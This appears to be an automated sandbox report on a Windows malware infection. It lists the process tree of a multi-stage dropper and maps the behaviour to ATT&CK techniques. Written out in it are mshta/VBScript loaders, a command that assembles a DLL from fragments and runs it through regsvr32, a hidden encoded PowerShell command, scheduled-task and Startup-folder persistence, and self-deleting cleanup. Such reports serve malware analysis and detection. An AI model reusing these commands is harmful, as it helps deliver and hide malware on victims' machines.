"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeadc54f50,0x7ffeadc54f60,0x7ffeadc54f70
10⤵
PID:1924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:8
10⤵
PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1956 /prefetch:8
10⤵
PID:4660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:2
10⤵
PID:2996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
10⤵
PID:5952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
10⤵
PID:5168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
10⤵
PID:5388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
10⤵
PID:4312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
10⤵
PID:4956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:8
10⤵
PID:4040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
10⤵
PID:5356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:8
10⤵
PID:4048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,6376362340617192892,15136903312753030552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
10⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
8⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
9⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\anytime 6.exe
"C:\Users\Admin\AppData\Local\Temp\anytime 6.exe"
8⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
10⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 1520
10⤵
- Program crash
PID:1524

C:\Users\Admin\AppData\Local\Temp\anytime 7.exe
"C:\Users\Admin\AppData\Local\Temp\anytime 7.exe"
8⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
10⤵
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 760
10⤵
- Program crash
PID:5260

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
8⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
10⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
10⤵
PID:5696

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5696 -s 1600
11⤵
- Program crash
PID:4040

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:440

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:4580

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4768

C:\Windows\SysWOW64\ftp.exe
ftp -?
6⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Esistenza.wbk
6⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
cmd
7⤵
PID:6016

C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe"
5⤵
- Executes dropped EXE
PID:3140

C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe"
5⤵
- Executes dropped EXE
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 1524
6⤵
- Program crash
PID:4232

C:\Users\Admin\Pictures\Adobe Films\re.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\re.exe.exe"
5⤵
- Executes dropped EXE
PID:1092

C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe"
5⤵
- Executes dropped EXE
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 452
6⤵
- Program crash
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 764
6⤵
- Program crash
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 772
6⤵
- Program crash
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 844
6⤵
- Program crash
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 852
6⤵
- Program crash
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 868
6⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 868
6⤵
- Executes dropped EXE
- Program crash
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1356
6⤵
- Program crash
PID:4040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte2205.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe" & exit
6⤵
PID:3652

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte2205.bmp.exe" /f
7⤵
- Kills process with taskkill
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1376
6⤵
- Program crash
PID:3488

C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe"
5⤵
- Executes dropped EXE
PID:2504

C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe"
5⤵
- Executes dropped EXE
PID:816

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"
6⤵
PID:2408

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
5⤵
- Executes dropped EXE
PID:1276

C:\Users\Admin\Pictures\Adobe Films\Fenix_11.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix_11.bmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe"
5⤵
- Executes dropped EXE
PID:3796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im real2201.bmp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:2056

C:\Windows\SysWOW64\taskkill.exe
taskkill /im real2201.bmp.exe /f
7⤵
- Kills process with taskkill
PID:4396

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1860
6⤵
- Program crash
PID:2148

C:\Users\Admin\Pictures\Adobe Films\Pokiness.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Pokiness.bmp.exe"
5⤵
- Executes dropped EXE
PID:3696

C:\Users\Admin\Pictures\Adobe Films\Pokiness.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Pokiness.bmp.exe"
6⤵
PID:4928

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
5⤵
- Executes dropped EXE
PID:2284

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
6⤵
PID:1516

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\dd256fbd-0416-4c30-be74-1cb6fb42962e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
7⤵
- Modifies file permissions
PID:2996

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
7⤵
PID:1924

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
8⤵
PID:3632

C:\Users\Admin\AppData\Local\da61e646-1bd8-409e-b53e-0b8c07b4bf5d\build2.exe
"C:\Users\Admin\AppData\Local\da61e646-1bd8-409e-b53e-0b8c07b4bf5d\build2.exe"
9⤵
PID:5604

C:\Users\Admin\AppData\Local\da61e646-1bd8-409e-b53e-0b8c07b4bf5d\build2.exe
"C:\Users\Admin\AppData\Local\da61e646-1bd8-409e-b53e-0b8c07b4bf5d\build2.exe"
10⤵
PID:6124

C:\Users\Admin\Pictures\Adobe Films\rezki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\rezki1.bmp.exe"
5⤵
- Executes dropped EXE
PID:3700

C:\Users\Admin\AppData\Local\Temp\9817bcdf33322e8fbc1670e731c76126.exe
"C:\Users\Admin\AppData\Local\Temp\9817bcdf33322e8fbc1670e731c76126.exe"
6⤵
PID:5524

C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_3.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_3.bmp.exe"
5⤵
PID:2320

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:1012

C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
6⤵
PID:428

C:\Windows\SysWOW64\timeout.exe
timeout 45
7⤵
- Delays execution with timeout.exe
PID:3572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat1700df32ec5fd6e.exe
3⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat171bd3ce8bbc6ed.exe
3⤵
PID:1944

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat171bd3ce8bbc6ed.exe
Sat171bd3ce8bbc6ed.exe
4⤵
- Executes dropped EXE
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat175bcb721ec3.exe
3⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat177a0c7e789ece.exe
3⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat1787f49a38.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat1787f49a38.exe" -u
1⤵
- Executes dropped EXE
PID:3496

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17fc809274f.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17fc809274f.exe" /SILENT
1⤵
- Executes dropped EXE
PID:2492

C:\Users\Admin\AppData\Local\Temp\is-5D4G4.tmp\Sat17fc809274f.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5D4G4.tmp\Sat17fc809274f.tmp" /SL5="$901CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17fc809274f.exe" /SILENT
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17bc816ccde620e.exe" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17bc816ccde620e.exe" ) do taskkill -f /iM "%~NXS"
1⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE
..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3356

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk ""== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))
3⤵
- Checks computer location settings
PID:3560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF "/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk "== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ) do taskkill -f /iM "%~NXS"
4⤵
PID:2224

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPT: cLOSE(cREateObJeCt( "wscRiPt.SHELl"). Run ("cMd /r Echo | set /P = ""MZ"" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q * " ,0 ,tRuE ) )
3⤵
- Checks computer location settings
PID:3788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r Echo | set /P = "MZ" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q *
4⤵
PID:2284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>V_DXQ.No"
5⤵
PID:208

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 ..\CxSXSHYX.ZBV -s
5⤵
- Loads dropped DLL
PID:408

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /iM "Sat17bc816ccde620e.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
1⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
2⤵
PID:3112

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
1⤵
- Creates scheduled task(s)
PID:3556

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
1⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat175bcb721ec3.exe
Sat175bcb721ec3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3440

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
Sat177a0c7e789ece.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4532

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
2⤵
- Executes dropped EXE
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat177a0c7e789ece.exe
2⤵
- Executes dropped EXE
PID:4056

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17bc816ccde620e.exe"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF """"== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17bc816ccde620e.exe"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))
1⤵
- Checks computer location settings
PID:3976

C:\Users\Admin\AppData\Local\Temp\is-O0K4B.tmp\Sat17777767f9d8b1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O0K4B.tmp\Sat17777767f9d8b1.tmp" /SL5="$50188,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17777767f9d8b1.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2504

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:2376

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:512

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 600
3⤵
- Program crash
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2768 -ip 2768
1⤵
PID:4228

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Executes dropped EXE
PID:3772

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
1⤵
- Executes dropped EXE
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4564 -ip 4564
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 4564 -ip 4564
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4564 -ip 4564
1⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4564 -ip 4564
1⤵
PID:3116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4564 -ip 4564
1⤵
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4564 -ip 4564
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4564 -ip 4564
1⤵
PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4564 -ip 4564
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4564 -ip 4564
1⤵
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3796 -ip 3796
1⤵
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2080 -ip 2080
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4808 -ip 4808
1⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
1⤵
PID:3764

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:5060

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 600
3⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4232 -ip 4232
1⤵
PID:1924

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 648 -p 5464 -ip 5464
1⤵
PID:4352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5164

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:6044

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:5388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 600
3⤵
- Program crash
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5388 -ip 5388
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5400 -ip 5400
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3388 -ip 3388
1⤵
PID:4184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 5696 -ip 5696
1⤵
PID:5872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

